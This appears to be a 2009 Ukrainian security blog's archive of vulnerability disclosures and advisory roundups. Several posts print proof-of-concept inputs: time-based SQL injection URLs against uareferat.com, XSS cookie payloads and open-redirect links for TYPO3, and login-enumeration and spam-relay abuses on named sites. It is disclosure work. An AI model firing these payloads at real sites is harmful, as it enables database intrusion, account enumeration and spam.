Архів для категорії 'Уразливості'

Добірка уразливостей

16:16 12.12.2009

В даній добірці уразливості в веб додатках:

  • Openfire multiple vulnerabilities (деталі)
  • USER OPTIONS CHANGER EXPLOIT MiniTwitter v0.2-Beta (деталі)
  • MULTIPLE SQL INJECTION VULNERABILITIES MiniTwitter v0.2-Beta (деталі)
  • BLIND SQL INJECTION Leap CMS 0.1.4 (деталі)
  • Walusoft TFTPServer2000 Version 3.6.1 Directory Traversal (деталі)
  • MULTPLE REMOTE VULNERABILITIES ProjectCMS v-1.1 Beta (деталі)
  • Cross-Site Scripting vulnerability in MyBB 1.4.5 (деталі)
  • Coppermine Photo Gallery 1.4.21 Cross-Site Scripting (деталі)
  • New drupal6 packages fix multiple vulnerabilities (деталі)
  • SQL INJECTION VULNERABILITIES ST-Gallery version 0.1 alpha (деталі)

Уразливості на www.interface.ru

20:07 11.12.2009

03.08.2009

У грудні, 12.12.2008, я знайшов Insufficient Anti-automation, Abuse of Functionality та Cross-Site Scripting уразливості на проекті http://www.interface.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.interface.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

11.12.2009

Insufficient Anti-automation:

http://www.interface.ru/services/mailfrompage.asp

Відсутній захист від автоматизованих запитів (капча).

Abuse of Functionality:

http://www.interface.ru/services/mailfrompage.asp

В параметрі toaddr можна задати довільний емайл адрес. Що дозволяє розсилати спам, враховуючи можливість модифікації й інших полів форми. А з врахуванням Insufficient Anti-automation, дана уразливість створює з форми цілий Spam Gateway.

XSS:

Дані уразливості досі не виправлені.

Уразливості на video.tochka.net

23:51 10.12.2009

У квітні, 15.04.2009, я знайшов Abuse of Functionality та Insufficient Anti-automation уразливості на проекті http://yashik.tv (відео хостінг). Як я нещодавно вияснив, проект yashik.tv змінів домен на video.tochka.net (і від зміни домена дірки нікуди не ділися).

Дані уразливості подібні до уразливостей на www.google.com та на багатьох інших сайтах.

Abuse of Functionality:

На сторінці реєстрації http://video.tochka.net/register/ функція “Проверить”, яка призначена для перевірки чи вільний даний логін, дозволяє дізнатися логіни користувачів в системі. В тому числі, Login Enumeration атаку можна провести через GET запит: http://video.tochka.net/register/check_username/?login=test.

Insufficient Anti-automation:

Враховучи, що дана функція немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів користувачів. Що може бути зроблено за допомогою брутфорсерів логінів, зокрема, моєї програми Brute force login identifier.

В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів сайта.

Добірка уразливостей

16:13 10.12.2009

В даній добірці уразливості в веб додатках:

  • Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit (деталі)
  • Formshield Captcha - Older Version vulnerable to replay attacks (деталі)
  • Hewlett-Packard OVIS Probe Builder Arbitrary Process Termination Vulnerability (деталі)
  • HP OpenView Internet Services Running Probe Builder, Remote Denial of Service (DoS) (деталі)
  • SQL INJECTION (SHELL UPLOAD) EZ-blog Beta2 (деталі)
  • MataChat Cross-Site Scripting Vulnerabilities (деталі)
  • MULTIPLE REMOTE SQL INJECTION VULNERABILITIES MIM:InfiniX v1.2.003 (деталі)
  • New vulnerabilities in Aardvark Topsites PHP (деталі)
  • MULTIPLE REMOTE VULNERABILITIES Leap CMS 0.1.4 (деталі)
  • SQL INJECTION (SQLi) VULNERABILITY ProjectCMS v1.0 Beta Final (деталі)

Уразливості на uareferat.com

19:13 09.12.2009

14.02.2009

У березні, 31.03.2008, я знайшов SQL DB Structure Extraction та SQL Injection уразливості на проекті http://uareferat.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

09.12.2009

SQL DB Structure Extraction:

http://uareferat.com/rus/details/13220/

http://uareferat.com/rus/referaty/’/

http://uareferat.com/rus/’/

http://uareferat.com/rus/referaty/1/-1/

http://uareferat.com/abton/

SQL Injection:

http://uareferat.com/rus/details/’+benchmark(10000,md5(now()))+’/

http://uareferat.com/rus/referaty/1′+version()-’1/

Вивело п’ятий розділ сайта, значить MySQL 5.x.

http://uareferat.com/rus/referaty/1?+benchmark(10000,md5(now()))-’1/

http://uareferat.com/rus/’+benchmark(10000,md5(now()))+’/

Дані уразливості вже виправлені.

Добірка уразливостей

16:11 08.12.2009

В даній добірці уразливості в веб додатках:

  • Motorola Timbuktu’s Internet Locator Service real-time data exposed to public (деталі)
  • FOWLCMS 1.1 Multiple Remote Vulnerabilities (деталі)
  • SAP Cfolders Multiple Linked XSS Vulnerabilities (деталі)
  • SAP Cfolders Multiple Stored XSS Vulnerabilies (деталі)
  • HTTP Response Splitting vulnerability in Sun Delegated Administrator (деталі)
  • MixedCMS 1.0 Multiple Remote Vulnerabilities (деталі)
  • New mahara packages fix cross-site scripting (деталі)
  • Telecom Italia Alice Pirelli routers backdoor discoverd to activate telnet/ftp/tftp from internal LAN/WLAN (деталі)
  • REMOTE SQL INJECTION (SQLi) VULNERABILITY Photo-Rigma.BiZ v30 (деталі)
  • Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities (деталі)

Уразливості на tabloid.pravda.com.ua

19:04 05.12.2009

29.07.2009

У грудні, 05.12.2008, я знайшов Cross-Site Scripting уразливості на проекті http://tabloid.pravda.com.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно проекту ТаблоID раніше я вже писав про уразливість на tabloid.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

05.12.2009

XSS:

Дані уразливості вже виправлені. Тільки варто не забувати дякувати людям, що дбають про безпеку вашого сайта, як це має місце у випадку Таблоіда (що цього разу, що попереднього).

Добірка уразливостей

16:19 04.12.2009

В даній добірці уразливості в веб додатках:

  • Authentication Bypass in Cisco Unity (деталі)
  • HP System Management Homepage (SMH) for Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
  • Creasito e-commerce content manager Authentication Bypass (деталі)
  • FunGamez Multiple Remote Vulnerabilities SQLi (INSECURE-COOKIE-HANDLING) LFI (деталі)
  • WysGui CMS 1.2 BETA (Insecure Cookie Handling) Blind sql injection exploit (деталі)
  • Sungard Banner System XSS (деталі)
  • Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities (деталі)
  • CLAN TIGER CMS 1.1.1 (AUTH BYPASS) SQL-INJECTION (деталі)
  • LittleCMS: Multiple vulnerabilities (деталі)
  • HP Deskjet 6800 XSS in Web Interface (деталі)

Уразливості в TYPO3

19:13 03.12.2009

02.10.2009

У лютому, 06.02.2009, я знайшов Cross-Site Scripting, Full path disclosure та Redirector уразливості в TYPO3. Це популярна CMS. Дані уразливості я виявив на сайті viland.ua, де використовується дана система. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

03.12.2009

XSS:

http://site/index.php?id=49&sword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/nc/search-result/start/1.html?tx_ttproducts_pi1%5Bsword%5D=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/index.php?jumpurl=%0A1

Redirector:

http://site/index.php?jumpurl=http://websecurity.com.ua

Уразливі TYPO3 4.2 CMS та попередні версії.

Уразливості на www.board4all.cz

23:51 02.12.2009

У квітні, 13.04.2009, я знайшов Cross-Site Scripting та Redirector уразливості на проекті http://www.board4all.cz. Про що найближчим часом сповіщу адміністрацію проекту.

Уразливості наявні в плагіні vbAnonymizer для vBulletin, про дірки в якому я вже писав.

XSS:

Redirector:

http://www.board4all.cz/redirector.php?url=http://websecurity.com.ua